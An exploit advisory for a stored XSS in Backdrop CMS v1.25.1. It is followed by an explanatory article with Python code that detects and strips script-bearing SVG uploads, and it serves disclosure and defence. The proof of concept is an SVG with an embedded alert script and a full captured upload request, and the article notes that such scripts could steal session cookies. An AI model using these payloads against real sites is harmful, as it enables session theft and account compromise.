Backdrop CMS v1.25.1 - Stored Cross-Site Scripting (XSS)
#Exploit Title: Backdrop CMS v1.25.1 - Stored Cross-Site Scripting (XSS)
#Application: Backdrop CMS
#Version: v1.25.1
#Bugs: Stored XSS
#Technology: PHP
#Vendor URL: https://backdropcms.org/
#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
#Date found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
1. Log in to an account
2. Go to http://localhost/backdrop/?q=admin/config/system/site-information
3. Upload an SVG file with the following content as the site logo:
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
4. Open the stored SVG file directly (http://localhost/backdrop/files/malas_2.svg)
Request
POST /backdrop/?q=admin/config/system/site-information HTTP/1.1
Host: localhost
Content-Length: 2116
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/backdrop/?q=admin/config/system/site-information
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E
Connection: close
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_name"
My Backdrop Site
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_slogan"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_mail"
admin@admin.com
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_logo_path"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_favicon_path"
core/misc/favicon.ico
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_frontpage"
home
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_403"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_404"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_build_id"
form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_token"
siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_id"
system_site_information_settings
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="op"
Save configuration
------WebKitForm

Backdrop CMS v1.25.1: Stored Cross-Site Scripting (XSS) Vulnerability Explained
Backdrop CMS, a lightweight fork of Drupal designed for simplicity and ease of use, has recently been flagged for a critical security flaw in version v1.25.1. This vulnerability, identified as a stored Cross-Site Scripting (XSS), allows attackers to inject malicious JavaScript code into the system through a seemingly innocuous file upload process. The exploit is particularly dangerous because the payload is persistently stored and executed whenever the affected resource is rendered.
Understanding Stored XSS
Stored XSS occurs when malicious scripts are permanently saved on a server and later executed in the context of a user’s browser. Unlike reflected XSS, which requires a user to click a malicious link, stored XSS can trigger automatically—making it far more dangerous in real-world scenarios.
For example, if a website allows users to upload a logo image and fails to sanitize the file content, an attacker could embed a script within an SVG file. When the logo is displayed, the browser executes the script, potentially stealing cookies, redirecting users, or compromising session integrity.
Exploit Details: SVG File Upload Abuse
The vulnerability in Backdrop CMS v1.25.1 stems from improper handling of SVG (Scalable Vector Graphics) file uploads within the Site Information configuration page. Specifically, the admin/config/system/site-information endpoint accepts file uploads without validating or sanitizing the content.
Attackers can exploit this by uploading a malicious SVG file containing embedded JavaScript. The payload is the SVG shown in the PoC above; the line that does the work is:
alert(document.location);
Explanation: This SVG file includes a harmless visual element, a green triangle, but also contains a <script> tag that executes alert(document.location) when the file is rendered as a document. The script runs in the site's origin, which is what makes the bug a stored XSS rather than a harmless image upload.
While the alert is harmless in this proof-of-concept (POC), in real attacks, the script could:
- Steal session cookies via document.cookie
- Redirect users to phishing sites
- Inject malicious content into the DOM
- Perform cross-origin requests to internal APIs
Attack Vector: Administrative Interface
The exploit requires authentication, meaning only users with administrative privileges can upload files to the site_logo_upload field. This limits the attack surface, but the risk remains material because that access can be obtained through:
- Compromised admin accounts
- Insider threats
- Weak password policies
- Phishing or credential theft
Once an attacker gains access to the admin panel, they can upload the malicious SVG and trigger execution simply by visiting the site logo URL, such as:
http://localhost/backdrop/files/malas_2.svg
Any user visiting this URL—especially administrators or content editors—will have the script executed in their browser.
Technical Analysis of the Request
The HTTP request used in the exploit demonstrates how the malicious SVG file is transmitted:
| Field | Value |
|---|---|
| Content-Disposition | form-data; name="files[site_logo_upload]"; filename="malas.svg" |
| Content-Type | image/svg+xml |
| Content | Malicious SVG code |
Despite the Content-Type being image/svg+xml, the server does not perform content validation or sanitize the file before storing it. This failure allows the script to be preserved and rendered as HTML.
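The check that is missing from the request handling above can be shown as an upload gate. The following is an added example, not Backdrop CMS code: it parses a multipart/form-data body with the Python standard library, locates the file parts, and rejects any SVG that carries script elements, event-handler attributes, javascript: URLs or foreignObject. The form body is a constructed, cut-down copy of the PoC request (same boundary and payload, three of its fields); the function names are this example's own.

```python
"""Upload gate for the site-logo field: parse a multipart/form-data body, find the
file parts, and reject any SVG that carries active content.  Added example; not
Backdrop CMS code.  Only the Python standard library is used."""
import re
import xml.etree.ElementTree as ET
from email import policy
from email.parser import BytesParser

# Boundary and payload taken from the PoC request in the advisory.
BOUNDARY = "----WebKitFormBoundaryVXWRsHHM3TVjALpg"
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
# Constructed benign logo for comparison.
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
<polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>
"""


def build_form_body(svg: bytes, filename: str) -> bytes:
    """Constructed cut-down copy of the PoC request body (three of its fields)."""
    parts = [
        ('Content-Disposition: form-data; name="site_name"', b"My Backdrop Site"),
        ('Content-Disposition: form-data; name="files[site_logo_upload]"; '
         f'filename="{filename}"\r\nContent-Type: image/svg+xml', svg),
        ('Content-Disposition: form-data; name="op"', b"Save configuration"),
    ]
    body = b""
    for headers, payload in parts:
        body += f"--{BOUNDARY}\r\n{headers}\r\n\r\n".encode() + payload + b"\r\n"
    return body + f"--{BOUNDARY}--\r\n".encode()


def _local(name: str) -> str:
    """Strip an ElementTree namespace prefix: '{ns}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def find_active_content(svg: bytes) -> list[str]:
    """List the script-bearing constructs in an SVG; an empty list means none found."""
    try:
        root = ET.fromstring(svg)  # expat does not fetch the external DTD named in the DOCTYPE
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.startswith("on"):
                findings.append(f"{a}= event handler")
            elif a == "href" and re.match(r"\s*javascript:", value, re.I):
                findings.append("javascript: URL")
    return findings


def check_upload(body: bytes) -> list[tuple[str, str, list[str]]]:
    """Return (form field, filename, findings) for every file part in the body."""
    raw = f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n\r\n".encode() + body
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    results = []
    for part in msg.iter_parts():
        filename = part.get_filename()
        if not filename:
            continue  # plain form field such as site_name
        field = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True)
        # Treat it as SVG if the client says so, the name says so, or the bytes say so;
        # the declared Content-Type is attacker-controlled and must not be trusted alone.
        looks_svg = (part.get_content_type() == "image/svg+xml"
                     or filename.lower().endswith(".svg")
                     or b"<svg" in data[:4096].lower())
        results.append((field, filename, find_active_content(data) if looks_svg else []))
    return results


def gate(body: bytes) -> bool:
    """True when every uploaded file may be stored; logs and returns False otherwise."""
    ok = True
    for field, filename, findings in check_upload(body):
        if findings:
            ok = False
            print(f"REJECT field={field} filename={filename!r}: {'; '.join(findings)}")
    return ok


if __name__ == "__main__":
    print("PoC upload accepted:", gate(build_form_body(POC_SVG, "malas.svg")))
    print("clean upload accepted:", gate(build_form_body(CLEAN_SVG, "logo.svg")))
```

Run as a script, the PoC body is rejected with a log line naming the field, the filename and the `<script>` element, while the benign logo passes. The gate inspects bytes rather than trusting the declared `image/svg+xml` type because, as the request above shows, that header is supplied by the client.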
Root Cause: Lack of Input Sanitization
Backdrop CMS, while designed for simplicity, lacks robust security checks when handling file uploads. The core issue is that:
- SVG files are treated as images, not as potentially executable content
- Script tags within SVG are not filtered or removed
- No validation or sandboxing of file contents occurs during upload
Although SVG files are designed for vector graphics, they support scripting via <script> elements, and event-handler attributes and javascript: links can carry script as well. Browsers do not run that script when an SVG is embedded through <img> or as a CSS background; it runs when the file is opened directly, as in step 4 of the PoC, or embedded through <object>, <embed> or <iframe>. This capability is often overlooked in security assessments, leading to vulnerabilities like this one.
Security Recommendations
For developers and administrators, the following mitigation strategies are essential:
- Validate file types and content: Implement MIME type checks and scan file contents for scripting elements, rather than trusting the client-supplied Content-Type.
- Sanitize SVG files: Strip <script> tags and prevent execution of embedded code.
- Use sandboxed rendering: Serve SVG files through a content security policy (CSP) that disables script execution, or serve user-supplied SVG from a separate origin so that any script that does run cannot reach the site's session.
- Limit upload permissions: Restrict who may upload files and enforce role-based access control.
- Update to patched versions: Immediately upgrade from v1.25.1 to the latest secure release.
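The sanitizing and serving items from the list above, as an added example that is not Backdrop CMS code: `sanitize_svg` rebuilds the SVG from its parsed tree without script elements, foreignObject, event-handler attributes or javascript: links, and `logo_response` pairs the cleaned bytes with response headers chosen for serving user-supplied SVG. The header values are this example's choices, not anything the advisory prescribes; `HANDLER_SVG` is a constructed sample with no <script> element, included to show that stripping tags alone is not enough.

```python
"""Sanitise an uploaded SVG and pick the response headers for serving it.
Added example; not Backdrop CMS code.  The header values are this example's
choices, not anything the advisory prescribes."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep xmlns="..." as the default namespace on output
ET.register_namespace("xlink", XLINK_NS)

# The PoC SVG from the advisory.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
# Constructed sample: no <script>, but an event handler and a javascript: link.
HANDLER_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
               b'<a xlink:href="javascript:void(0)" onclick="void(0)">'
               b'<rect width="10" height="10"/></a></svg>')


def _local(name: str) -> str:
    """Strip an ElementTree namespace prefix: '{ns}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def sanitize_svg(svg: bytes) -> tuple[bytes, list[str]]:
    """Return (clean SVG bytes, list of what was removed); ValueError if not an SVG."""
    root = ET.fromstring(svg)
    if _local(root.tag) != "svg":
        raise ValueError(f"root element is <{_local(root.tag)}>, not <svg>")
    removed = []
    # Drop script-capable elements; iterate over parents so removal happens in place.
    for parent in list(root.iter()):
        for child in list(parent):
            tag = _local(child.tag)
            if tag in ("script", "foreignobject"):
                parent.remove(child)
                removed.append(f"<{tag}>")
    # Drop event-handler attributes and javascript: links on whatever remains.
    for el in root.iter():
        for attr in list(el.attrib):
            a = _local(attr)
            if a.startswith("on"):
                del el.attrib[attr]
                removed.append(f"{a}=")
            elif a == "href" and re.match(r"\s*javascript:", el.attrib[attr], re.I):
                del el.attrib[attr]
                removed.append("javascript: href")
    # Re-serialise from the tree: the DOCTYPE and its external DTD reference are not kept.
    return ET.tostring(root, encoding="utf-8", xml_declaration=True), removed


def logo_response(svg: bytes) -> tuple[dict[str, str], bytes]:
    """Sanitised body plus headers that keep any residue from executing when the
    file is opened directly (step 4 of the PoC) rather than embedded via <img>."""
    clean, _ = sanitize_svg(svg)
    headers = {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        # No scripts and no external loads; inline styles are all a static SVG needs.
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'",
        # Direct navigation to the file becomes a download instead of a rendered page.
        "Content-Disposition": "attachment",
    }
    return headers, clean


if __name__ == "__main__":
    for label, sample in (("PoC", POC_SVG), ("handler", HANDLER_SVG)):
        clean, removed = sanitize_svg(sample)
        print(label, "removed:", removed)
        print(clean.decode())
```

The sanitizer works on the parsed tree rather than on the text, so obfuscated spellings of `<script>` do not get past it, and it deliberately drops the DOCTYPE so the stored file no longer references an external DTD. Serving with `Content-Disposition: attachment` changes how a direct visit to the file behaves; confirm in your own browsers that the logo still renders where the theme embeds it via `<img>` before relying on it.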
Conclusion: A Wake-Up Call for CMS Security
Backdrop CMS v1.25.1’s stored XSS vulnerability underscores a critical truth: even simple, lightweight systems are not immune to serious security flaws. The attack demonstrates how a small oversight—failing to sanitize SVG file content—can lead to widespread exploitation.
Security is not about complexity; it’s about diligence. Every file upload, every form input, every rendered resource must be treated as a potential attack vector. Developers must assume that any user input can be malicious and apply defense-in-depth principles.
For organizations using Backdrop CMS, this vulnerability is a red flag. Immediate patching, thorough auditing, and ongoing security training are essential to prevent exploitation.